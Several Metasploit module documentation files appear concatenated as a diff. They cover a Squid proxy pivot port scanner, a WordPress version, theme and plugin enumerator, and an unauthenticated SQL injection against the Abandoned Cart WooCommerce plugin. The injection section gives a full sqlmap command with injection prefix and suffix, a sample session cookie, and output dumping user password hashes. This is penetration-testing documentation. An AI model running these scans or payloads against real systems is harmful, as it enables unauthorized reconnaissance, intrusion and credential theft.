+## Version and OS
+Tested against Microsoft IIS 10.0 and RDWeb on Windows Server 2019 and Windows Server 2016
+
+## References
+- https://raxis.com/blog/rd-web-access-vulnerability
@@ -0,0 +1,283 @@
+## Description
+
+A exposed Squid proxy will usually allow an attacker to make requests on their behalf. If misconfigured, this may give the attacker information about devices that they cannot normally reach. For example, an attacker may be able to make requests for internal IP addresses against an open Squid proxy exposed to the Internet, therefore performing a port scan against the internal network.
+
+The `auxiliary/scanner/http/open_proxy` module can be used to test for open proxies, though a Squid proxy does not have to be on the open Internet in order to allow for pivoting (e.g. an Intranet Squid proxy which allows the attack to pivot to another part of the internal network).
+
+This module will not be able to scan network ranges or ports denied by Squid ACLs. Fortunately it is possible to detect whether a host was up and the port was closed, or if the request was blocked by an ACL, based on the response Squid gives. This feedback is provided to the user in meterpreter `VERBOSE` output, otherwise only open and permitted ports are printed.
+
+
+### Vulnerable Application Setup
+
+The [official Squid configuration documentation](https://wiki.squid-cache.org/SquidFaq/ConfiguringSquid) covers the significant flexibility of the Squid proxy. For this module, the most relevant core Squid configuration lines usually looks like this (default for version 3.5):
+
+```
+http_port 3128
+
+acl localnet src 10.0.0.0/8     # RFC1918 possible internal network
+acl localnet src 172.16.0.0/12  # RFC1918 possible internal network
+acl localnet src 192.168.0.0/16 # RFC1918 possible internal network
+acl localnet src fc00::/7       # RFC 4193 local private network range
+acl localnet src fe80::/10      # RFC 4291 link-local (directly plugged) machines
+
+acl SSL_ports port 443
+
+acl Safe_ports port 80          # http
+acl Safe_ports port 21          # ftp
+acl Safe_ports port 443         # https
+acl Safe_ports port 70          # gopher
+acl Safe_ports port 210         # wais
+acl Safe_ports port 280         # http-mgmt
+acl Safe_ports port 488         # gss-http
+acl Safe_ports port 591         # filemaker
+acl Safe_ports port 777         # multiling http
+acl Safe_ports port 1025-65535  # unregistered ports
+
+acl CONNECT method CONNECT
+
+http_access deny !Safe_ports
+http_access deny CONNECT !SSL_ports
+http_access allow localhost manager
+http_access deny manager
+
+#
+# INSERT YOUR OWN RULE(S) HERE TO ALLOW ACCESS FROM YOUR CLIENTS
+#
+
+http_access allow localnet
+http_access allow localhost
+http_access deny all
+```
+
+In short, this opens port 3128 for proxying from `localhost` or a `localnet` ranges to any port in `Safe_ports`, and allows SSL CONNECT requests to be made to `SSL_ports` (just 443 in this example).
+
+The references to "manager" are referring to a component of Squid which provides management controls and reports displaying statistics about the squid process as it runs, and can show useful information like file descriptors or internal hostnames and IP addresses if the ACL permits access. [See the official docs](https://wiki.squid-cache.org/Features/CacheManager) for more information on the Cache Manager.
+
+As such, you should be able to install Squid with default configuration, and reach through it from an internal network source range to anythin the Squid proxy has a route to. If you wish to test against other ports or network ranges, modify the configuration to suit prior to testing.
+
+
+## Verification Steps
+To test this module, you can try the following:
+
+1. Install Squid
+1. Start the Squid service
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/squid_pivot_scanning`
+1. Set the `RHOSTS` and `RPORT` to be that of Squid's host address and port:
+    1. `set RHOSTS squid.internal`
+    1. `set RPORT 3128`
+1. Set the `RANGE` parameter to be the destination host addresses you wish to port scan.
+    1. `set RANGE 192.168.0.1-192.168.0.2`
+1. (Optional) Set the specific `PORTS` parameter to any ports you wish to port scan on the hosts in `RANGE`.
+    1. `set PORTS 21-23,80,443`
+1. Do: `run`
+1. You should see the module attempt to connect to the proxy, and then first port of the first host in `RANGE`. Ports will be tested sequentially until the end of `PORTS` is reached, at which point it will start from the first port on the next host in `RANGE`.
+
+
+## Options
+Here is a quick overview of each option within the module.
+
+### CANARY_IP
+
+The IP to check if the proxy always answers positively - this IP address should not normally respond.
+
+Default value: `1.2.3.4`
+
+### MANUAL_CHECK
+
+Invoke the canary check, and stop the scan if the Squid proxy server appears to answer positively to every request.
+
+Default value: `true`
+
+### PORTS
+
+The destination TCP ports to scan through the proxy. Ports will be scanned in ascending order.
+
+Note: these must be TCP, this scanner cannot scan other protocols.
+
+### Proxies
+
+This option should not be confused with the Squid proxy you are trying to scan - this is one of the default Meterpreter paramets in which you can specify a proxy chain to use that you require to reach the Squid proxy.
+
+### RANGE
+
+This is the IP range you wish to sca through the Squid proxy. `PORTS` on these hosts will be scanned. Hosts are scanned in ascending order.
+
+### RPORT
+
+This is the port that the Squid proxy is listening on. Squid defaults to 3128.
+
+Default value: `3128`
+
+### SSL
+
+Whether you need to connect to Squid with SSL. This is not normally the case.
+
+Default value: `false`
+
+### THREADS
+
+The number of concurrent threads (max one per Squid host).
+
+Default value: `1`
+
+### VHOST
+
+HTTP server virtual host header to send on requests.
+
+
+## Scenarios and Examples
+The following is a brief demo of a port scan against two hosts (`192.168.0.1` and `192.168.0.2`) through a Squid proxy responding at `10.10.10.100:3128`. You could assume that the Squid host has a public or otherwise reachable IP address, where the `192.168.0.0` network range is not normally reachable to you.
+
+```
+msf6 > use auxiliary/scanner/http/squid_pivot_scanning
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > set RHOSTS 10.10.10.100
+RHOSTS => 10.10.10.100
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > set RPORT 3128
+RPORT => 3128
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > set PORTS 21-25,79-81,139,443,445,1433,1521,1723,3389,8080,9100
+PORTS => 21-25,79-81,139,443,445,1433,1521,1723,3389,8080,9100
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > set RANGE 192.168.0.1-192.168.0.2
+RANGE => 192.168.0.1-192.168.0.2
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > run
+
+[+] [10.10.10.100] 192.168.0.1 is alive.
+[+] [10.10.10.100] 192.168.0.1:80 seems open (HTTP 200, server header: 'nginx/1.14.0 (Ubuntu)').
+[+] [10.10.10.100] 192.168.0.2 is alive.
+[+] [10.10.10.100] 192.168.0.2:80 seems open (HTTP 302 redirect to: 'index.php', server header: 'nginx/1.14.0 (Ubuntu)')
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+Setting the `VERBOSE` option will show each port tested and explain the reason for unreachable ports, if known. This can be helpful, as a port might very well be open and responding on a host, however if it is denied by the Squid ACL you will be unable to reach it regardless.
+
+```
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > set VERBOSE true
+VERBOSE => true
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > run
+
+[*] [10.10.10.100] Verifying manual testing is not required...
+[*] [10.10.10.100] Requesting 192.168.0.1:21
+[+] [10.10.10.100] 192.168.0.1 is alive.
+[*] [10.10.10.100] 192.168.0.1 is alive but 21 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.1:22
+[*] [10.10.10.100] 192.168.0.1:22 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.1:23
+[*] [10.10.10.100] 192.168.0.1:23 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.1:24
+[*] [10.10.10.100] 192.168.0.1:24 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.1:25
+[*] [10.10.10.100] 192.168.0.1:25 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.1:79
+[*] [10.10.10.100] 192.168.0.1:79 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.1:80
+[+] [10.10.10.100] 192.168.0.1:80 seems open (HTTP 200, server header: 'nginx/1.14.0 (Ubuntu)').
+[*] [10.10.10.100] Requesting 192.168.0.1:81
+[*] [10.10.10.100] 192.168.0.1:81 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.1:139
+[*] [10.10.10.100] 192.168.0.1:139 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.1:443
+[*] [10.10.10.100] 192.168.0.1 is alive but 443 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.1:445
+[*] [10.10.10.100] 192.168.0.1:445 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.1:1433
+[*] [10.10.10.100] 192.168.0.1 is alive but 1433 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.1:1521
+[*] [10.10.10.100] 192.168.0.1 is alive but 1521 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.1:1723
+[*] [10.10.10.100] 192.168.0.1 is alive but 1723 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.1:3389
+[*] [10.10.10.100] 192.168.0.1 is alive but 3389 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.1:8080
+[*] [10.10.10.100] 192.168.0.1 is alive but 8080 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.1:9100
+[*] [10.10.10.100] 192.168.0.1 is alive but 9100 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.2:21
+[+] [10.10.10.100] 192.168.0.2 is alive.
+[*] [10.10.10.100] 192.168.0.2 is alive but 21 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.2:22
+[*] [10.10.10.100] 192.168.0.2:22 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.2:23
+[*] [10.10.10.100] 192.168.0.2:23 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.2:24
+[*] [10.10.10.100] 192.168.0.2:24 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.2:25
+[*] [10.10.10.100] 192.168.0.2:25 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.2:79
+[*] [10.10.10.100] 192.168.0.2:79 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.2:80
+[+] [10.10.10.100] 192.168.0.2:80 seems open (HTTP 302 redirect to: 'index.php', server header: 'nginx/1.14.0 (Ubuntu)')
+[*] [10.10.10.100] Requesting 192.168.0.2:81
+[*] [10.10.10.100] 192.168.0.2:81 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.2:139
+[*] [10.10.10.100] 192.168.0.2:139 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.2:443
+[*] [10.10.10.100] 192.168.0.2 is alive but 443 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.2:445
+[*] [10.10.10.100] 192.168.0.2:445 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.2:1433
+[*] [10.10.10.100] 192.168.0.2 is alive but 1433 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.2:1521
+[*] [10.10.10.100] 192.168.0.2 is alive but 1521 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.2:1723
+[*] [10.10.10.100] 192.168.0.2 is alive but 1723 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.2:3389
+[*] [10.10.10.100] 192.168.0.2 is alive but 3389 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.2:8080
+[*] [10.10.10.100] 192.168.0.2 is alive but 8080 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.2:9100
+[*] [10.10.10.100] 192.168.0.2 is alive but 9100 is closed.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+If the Squid administrator has made the error of having an ACL be too permissive, you might even see more interesting ports. A contrived example is below, note SSH has been added to `Safe_ports`.
+
+```
+acl Safe_ports port 80          # http
+acl Safe_ports port 443         # https
+acl Safe_ports port 21          # ftp
+acl Safe_ports port 22          # ssh
+
+http_access deny !Safe_ports
+http_access allow localhost
+http_access allow localnet
+http_access deny all
+```
+
+```
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > set TARGETS 127.0.0.1
+TARGETS => 127.0.0.1
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > set RANGE 127.0.0.1
+RANGE => 127.0.0.1
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > set PORTS 21-23
+PORTS => 21-23
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > run
+
+[*] [10.10.10.100] Verifying manual testing is not required...
+[*] [10.10.10.100] Requesting 127.0.0.1:21
+[+] [10.10.10.100] 127.0.0.1 is alive.
+[*] [10.10.10.100] 127.0.0.1 is alive but 21 is closed.
+[*] [10.10.10.100] Requesting 127.0.0.1:22
+[+] [10.10.10.100] 127.0.0.1:22 seems open (HTTP 200, server header: 'unknown').
+[*] [10.10.10.100] Requesting 127.0.0.1:23
+[*] [10.10.10.100] 127.0.0.1:23 likely blocked by ACL.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+
+Finally, it is worth knowing that all open discovered ports are saved as services for later viewing:
+
+```
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > services
+Services
+========
+
+host          port  proto  name                   state  info
+----          ----  -----  ----                   -----  ----
+127.0.0.1     22    tcp    unknown                open   SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2
+Protocol mismatch.
+192.168.0.1  80    tcp    nginx/1.14.0 (ubuntu)  open   <html><head>...
+192.168.0.2  80    tcp    nginx/1.14.0 (ubuntu)  open   Redirect to: index.php
+```
@@ -1,11 +1,10 @@
-## Description
-
-Detects Wordpress installations and their version number.
-
-
 ## Vulnerable Application

+Detects Wordpress installations and their version number.
+Also, optionally, detects themes and plugins.
+
 ### Setup using Docksal
+
 Install [Docksal](https://docksal.io/)

 Create a new WordPress installation using `fin project create`
@@ -75,10 +74,34 @@ Admin panel: http://msf-wp.docksal/wp-admin. User/password: admin/admin

 ## Verification Steps

-1. Do: ```use auxiliary/scanner/http/wordpress_sanner```
-2. Do: ```set RHOSTS [IP]```
-3. Do: ```set VHOST [HOSTNAME]```
-4. Do: ```run```
+1. Do: `use auxiliary/scanner/http/wordpress_sanner`
+2. Do: `set RHOSTS [IP]`
+3. Do: `set VHOST [HOSTNAME]`
+4. Do: `run`
+
+## Options
+
+### PLUGINS
+
+If plugins should be scanned. Defaults to `true`
+
+### PLUGINS_FILE
+
+Which plugins list to use. Default is `data/wordlists/wp-plugins.txt`
+
+### THEMES
+
+If themes should be scanned. Defaults to `true`
+
+### THEMES_FILE
+
+Which themes list to use. Default is `data/wordlists/wp-themes.txt`
+
+### Progress
+
+How often to print a prorgress bar while scanning for themes/plugins.  Defaults to `1000`
+
+## Scenarios

 ### Wordpress 5.2 running in Docksal

@@ -99,3 +122,148 @@ msf5 auxiliary(scanner/http/wordpress_scanner) > run
 msf5 auxiliary(scanner/http/wordpress_scanner) > 

 ```
+
+### Wordpress 5.4.2 with Plugin and Theme Enumeration
+
+```
+msf6 > use auxiliary/scanner/http/wordpress_scanner
+[*] Using auxiliary/scanner/http/wordpress_scanner
+msf6 auxiliary(scanner/http/wordpress_scanner) > set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf6 auxiliary(scanner/http/wordpress_scanner) > run
+
+[*] Trying 1.1.1.1
+[+] 1.1.1.1 - Detected Wordpress 5.4.2
+[*] 1.1.1.1 - Enumerating Themes
+[*] 1.1.1.1 - Progress      0/19226 (0.0%)
+[*] 1.1.1.1 - Progress   1000/19226 (5.2%)
+[*] 1.1.1.1 - Progress   2000/19226 (10.4%)
+[*] 1.1.1.1 - Progress   3000/19226 (15.6%)
+[*] 1.1.1.1 - Progress   4000/19226 (20.8%)
+[*] 1.1.1.1 - Progress   5000/19226 (26.0%)
+[*] 1.1.1.1 - Progress   6000/19226 (31.2%)
+[*] 1.1.1.1 - Progress   7000/19226 (36.4%)
+[*] 1.1.1.1 - Progress   8000/19226 (41.61%)
+[*] 1.1.1.1 - Progress   9000/19226 (46.81%)
+[*] 1.1.1.1 - Progress  10000/19226 (52.01%)
+[*] 1.1.1.1 - Progress  11000/19226 (57.21%)
+[*] 1.1.1.1 - Progress  12000/19226 (62.41%)
+[*] 1.1.1.1 - Progress  13000/19226 (67.61%)
+[*] 1.1.1.1 - Progress  14000/19226 (72.81%)
+[*] 1.1.1.1 - Progress  15000/19226 (78.01%)
+[*] 1.1.1.1 - Progress  16000/19226 (83.22%)
+[*] 1.1.1.1 - Progress  17000/19226 (88.42%)
+[+] 1.1.1.1 - Detected theme: twentynineteen version 1.5
+[+] 1.1.1.1 - Detected theme: twentyseventeen version 2.3
+[*] 1.1.1.1 - Progress  18000/19226 (93.62%)
+[*] 1.1.1.1 - Progress  19000/19226 (98.82%)
+[*] 1.1.1.1 - Finished scanning themes
+[*] 1.1.1.1 - Enumerating plugins
+[*] 1.1.1.1 - Progress      0/80624 (0.0%)
+[*] 1.1.1.1 - Progress   1000/80624 (1.24%)
+[*] 1.1.1.1 - Progress   2000/80624 (2.48%)
+[+] 1.1.1.1 - Detected plugin: akismet version 4.1.5
+[*] 1.1.1.1 - Progress   3000/80624 (3.72%)
+[*] 1.1.1.1 - Progress   4000/80624 (4.96%)
+[*] 1.1.1.1 - Progress   5000/80624 (6.2%)
+[*] 1.1.1.1 - Progress   6000/80624 (7.44%)
+[*] 1.1.1.1 - Progress   7000/80624 (8.68%)
+[*] 1.1.1.1 - Progress   8000/80624 (9.92%)
+[*] 1.1.1.1 - Progress   9000/80624 (11.16%)
+[*] 1.1.1.1 - Progress  10000/80624 (12.4%)
+[*] 1.1.1.1 - Progress  11000/80624 (13.64%)
+[*] 1.1.1.1 - Progress  12000/80624 (14.88%)
+[*] 1.1.1.1 - Progress  13000/80624 (16.12%)
+[+] 1.1.1.1 - Detected plugin: contact-form-7 version 5.1.9
+[*] 1.1.1.1 - Progress  14000/80624 (17.36%)
+[*] 1.1.1.1 - Progress  15000/80624 (18.6%)
+[*] 1.1.1.1 - Progress  16000/80624 (19.84%)
+[*] 1.1.1.1 - Progress  17000/80624 (21.08%)
+[*] 1.1.1.1 - Progress  18000/80624 (22.32%)
+[+] 1.1.1.1 - Detected plugin: drag-and-drop-multiple-file-upload-contact-form-7 version 1.3.3.2
+[*] 1.1.1.1 - Progress  19000/80624 (23.56%)
+[*] 1.1.1.1 - Progress  20000/80624 (24.8%)
+[+] 1.1.1.1 - Detected plugin: email-subscribers version 4.2.2
+[*] 1.1.1.1 - Progress  21000/80624 (26.04%)
+[*] 1.1.1.1 - Progress  22000/80624 (27.28%)
+[*] 1.1.1.1 - Progress  23000/80624 (28.52%)
+[*] 1.1.1.1 - Progress  24000/80624 (29.76%)
+[*] 1.1.1.1 - Progress  25000/80624 (31.0%)
+[*] 1.1.1.1 - Progress  26000/80624 (32.24%)
+[*] 1.1.1.1 - Progress  27000/80624 (33.48%)
+[*] 1.1.1.1 - Progress  28000/80624 (34.72%)
+[*] 1.1.1.1 - Progress  29000/80624 (35.96%)
+[*] 1.1.1.1 - Progress  30000/80624 (37.2%)
+[*] 1.1.1.1 - Progress  31000/80624 (38.45%)
+[*] 1.1.1.1 - Progress  32000/80624 (39.69%)
+[*] 1.1.1.1 - Progress  33000/80624 (40.93%)
+[*] 1.1.1.1 - Progress  34000/80624 (42.17%)
+[*] 1.1.1.1 - Progress  35000/80624 (43.41%)
+[+] 1.1.1.1 - Detected plugin: loginizer version 1.6.3
+[*] 1.1.1.1 - Progress  36000/80624 (44.65%)
+[*] 1.1.1.1 - Progress  37000/80624 (45.89%)
+[*] 1.1.1.1 - Progress  38000/80624 (47.13%)
+[*] 1.1.1.1 - Progress  39000/80624 (48.37%)
+[*] 1.1.1.1 - Progress  40000/80624 (49.61%)
+[*] 1.1.1.1 - Progress  41000/80624 (50.85%)
+[*] 1.1.1.1 - Progress  42000/80624 (52.09%)
+[*] 1.1.1.1 - Progress  43000/80624 (53.33%)
+[*] 1.1.1.1 - Progress  44000/80624 (54.57%)
+[*] 1.1.1.1 - Progress  45000/80624 (55.81%)
+[*] 1.1.1.1 - Progress  46000/80624 (57.05%)
+[*] 1.1.1.1 - Progress  47000/80624 (58.29%)
+[*] 1.1.1.1 - Progress  48000/80624 (59.53%)
+[*] 1.1.1.1 - Progress  49000/80624 (60.77%)
+[*] 1.1.1.1 - Progress  50000/80624 (62.01%)
+[*] 1.1.1.1 - Progress  51000/80624 (63.25%)
+[*] 1.1.1.1 - Progress  52000/80624 (64.49%)
+[*] 1.1.1.1 - Progress  53000/80624 (65.73%)
+[*] 1.1.1.1 - Progress  54000/80624 (66.97%)
+[*] 1.1.1.1 - Progress  55000/80624 (68.21%)
+[+] 1.1.1.1 - Detected plugin: simple-file-list version 4.2.2
+[*] 1.1.1.1 - Progress  56000/80624 (69.45%)
+[*] 1.1.1.1 - Progress  57000/80624 (70.69%)
+[*] 1.1.1.1 - Progress  58000/80624 (71.93%)
+[*] 1.1.1.1 - Progress  59000/80624 (73.17%)
+[*] 1.1.1.1 - Progress  60000/80624 (74.41%)
+[*] 1.1.1.1 - Progress  61000/80624 (75.65%)
+[*] 1.1.1.1 - Progress  62000/80624 (76.9%)
+[*] 1.1.1.1 - Progress  63000/80624 (78.14%)
+[*] 1.1.1.1 - Progress  64000/80624 (79.38%)
+[*] 1.1.1.1 - Progress  65000/80624 (80.62%)
+[*] 1.1.1.1 - Progress  66000/80624 (81.86%)
+[*] 1.1.1.1 - Progress  67000/80624 (83.1%)
+[*] 1.1.1.1 - Progress  68000/80624 (84.34%)
+[*] 1.1.1.1 - Progress  69000/80624 (85.58%)
+[*] 1.1.1.1 - Progress  70000/80624 (86.82%)
+[*] 1.1.1.1 - Progress  71000/80624 (88.06%)
+[*] 1.1.1.1 - Progress  72000/80624 (89.3%)
+[*] 1.1.1.1 - Progress  73000/80624 (90.54%)
+[*] 1.1.1.1 - Progress  74000/80624 (91.78%)
+[*] 1.1.1.1 - Progress  75000/80624 (93.02%)
+[*] 1.1.1.1 - Progress  76000/80624 (94.26%)
+[*] 1.1.1.1 - Progress  77000/80624 (95.5%)
+[*] 1.1.1.1 - Progress  78000/80624 (96.74%)
+[*] 1.1.1.1 - Progress  79000/80624 (97.98%)
+[*] 1.1.1.1 - Progress  80000/80624 (99.22%)
+[*] 1.1.1.1 - Finished scanning plugins
+[*] 1.1.1.1 - Finished all scans
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/wordpress_scanner) > notes
+
+Notes
+=====
+
+ Time                     Host     Service  Port  Protocol  Type                                                                                 Data
+ ----                     ----     -------  ----  --------  ----                                                                                 ----
+ 2020-12-04 19:01:18 UTC  1.1.1.1  http     80    tcp       Wordpress 5.4.2                                                                      "/"
+ 2020-12-05 02:16:03 UTC  1.1.1.1  http     80    tcp       Wordpress Theme: twentynineteen version 1.5                                          {}
+ 2020-12-05 02:16:03 UTC  1.1.1.1  http     80    tcp       Wordpress Theme: twentyseventeen version 2.3                                         {}
+ 2020-12-05 02:16:58 UTC  1.1.1.1  http     80    tcp       Wordpress Plugin: akismet version 4.1.5                                              {}
+ 2020-12-05 02:18:44 UTC  1.1.1.1  http     80    tcp       Wordpress Plugin: contact-form-7 version 5.1.9                                       {}
+ 2020-12-05 02:19:35 UTC  1.1.1.1  http     80    tcp       Wordpress Plugin: drag-and-drop-multiple-file-upload-contact-form-7 version 1.3.3.2  {}
+ 2020-12-05 02:19:58 UTC  1.1.1.1  http     80    tcp       Wordpress Plugin: email-subscribers version 4.2.2                                    {}
+ 2020-12-05 02:22:41 UTC  1.1.1.1  http     80    tcp       Wordpress Plugin: loginizer version 1.6.3                                            {}
+ 2020-12-05 02:26:05 UTC  1.1.1.1  http     80    tcp       Wordpress Plugin: simple-file-list version 4.2.2                                     {}
+```
@@ -0,0 +1,89 @@
+## Vulnerable Application
+
+Abandoned Cart, a plugin for WordPress which extends the WooCommerce plugin,
+prior to 5.8.2 is affected by an unauthenticated SQL injection via the
+billing_first_name parameter of the save_data AJAX call.  A valid
+wp_woocommerce_session cookie is required, which has at least one item in the
+cart.
+
+The plugin can be downloaded from
+[here](https://downloads.wordpress.org/plugin/woocommerce-abandoned-cart.5.8.1.zip)
+
+You'll need to first install WooCommerce and set up a shop with at least one item.
+Next, install and activate Abandoned Cart.
+
+This module slightly replicates sqlmap running as:
+
+```
+sqlmap -u http://local.target/wp-admin/admin-ajax.php --cookie='[cookies content here]' --method='POST' --data='billing_first_name=wpdeeply&billing_last_name=wpdeeply&billing_company=wpdeeply&billing_address_1=wpdeeply&billing_address_2=wpdeeply&billing_city=wpdeeply&billing_state=wpdeeply&billing_postcode=123234&billing_country=GB&billing_phone=12324&billing_email=wpdeeply%40protonmail.com&order_notes=&wcal_guest_capture_nonce=[nonce-value]&action=save_data' -p billing_first_name --prefix="', '', '','', '',( TRUE " --suffix=")) -- wpdeeply" --dbms mysql --technique=T --time-sec=1
+```
+
+## Verification Steps
+
+1. Install the plugin on wordpress
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/wp_abandoned_cart_sqli`
+1. Do: `set rhosts [ip]`
+1. Do: `set cookie [cookie]`
+1. Do: `run`
+1. You should get username and password hashes.
+
+## Options
+
+### ACTION: List Users
+
+This action lists `COUNT` users and password hashes.
+
+### COOKIE
+
+A valid `wp_woocommerce_session` cookie, which has at least 1 item in the cart.  An example is:
+`wp_woocommerce_session_d2959e58288b6133e71de74309fcabfb=257056469b604b6a005c25ea293c83f9%7C%7C1609808347%7C%7C1609804747%7C%7C499137359f4d8c16f125fba6cf58ff57`.
+
+### COUNT
+
+If Action `List Users` is selected (default), this is the number of users to enumerate.
+The larger this list, the more time it will take.  Defaults to `1`.
+
+## Scenarios
+
+### Wordpress 5.4.2 with WooCommerce 4.8.0 and Abandoned Cart 5.8.1 on Ubuntu 20.04 using MariaDB 10.3.22
+
+```
+resource (abandoned.rb)> use auxiliary/scanner/http/wp_abandoned_cart_sqli
+resource (abandoned.rb)> set rhosts 111.111.1.111
+rhosts => 111.111.1.111
+resource (abandoned.rb)> set verbose true
+verbose => true
+resource (abandoned.rb)> set cookie "wp_woocommerce_session_d2959e58288b6133e71de74309fcabfb=257056469b604b6a005c25ea293c83f9%7C%7C1609808347%7C%7C1609804747%7C%7C499137359f4d8c16f125fba6cf58ff57"
+cookie => wp_woocommerce_session_d2959e58288b6133e71de74309fcabfb=257056469b604b6a005c25ea293c83f9%7C%7C1609808347%7C%7C1609804747%7C%7C499137359f4d8c16f125fba6cf58ff57
+resource (abandoned.rb)> set count 3
+count => 3
+resource (abandoned.rb)> run
+[*] Checking /wp-content/plugins/woocommerce-abandoned-cart/readme.txt
+[*] Found version You in the plugin
+[+] Vulnerable version detected
+[*] Nonce: b56eb3a2cb
+[*] Enumerating Usernames and Password Hashes
+[*] {SQLi} Executing (select group_concat(PghfuFZ) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) PghfuFZ from wp_users limit 3) eOMLbNMh)
+[*] {SQLi} Time-based injection: expecting output of length 124
+[+] wp_users
+========
+
+ user_login  user_pass
+ ----------  ---------
+ admin       $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0
+ admin2      $P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1
+ editor      $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/wp_abandoned_cart_sqli) > creds
+Credentials
+===========
+
+host  origin         service  public  private                             realm  private_type        JtR Format
+----  ------         -------  ------  -------                             -----  ------------        ----------
+      111.111.1.111           admin2  $P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1         Nonreplayable hash  phpass
+      111.111.1.111           editor  $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/         Nonreplayable hash  phpass
+      111.111.1.111           admin   $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0         Nonreplayable hash  phpass
+```
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .6.6
 .7.2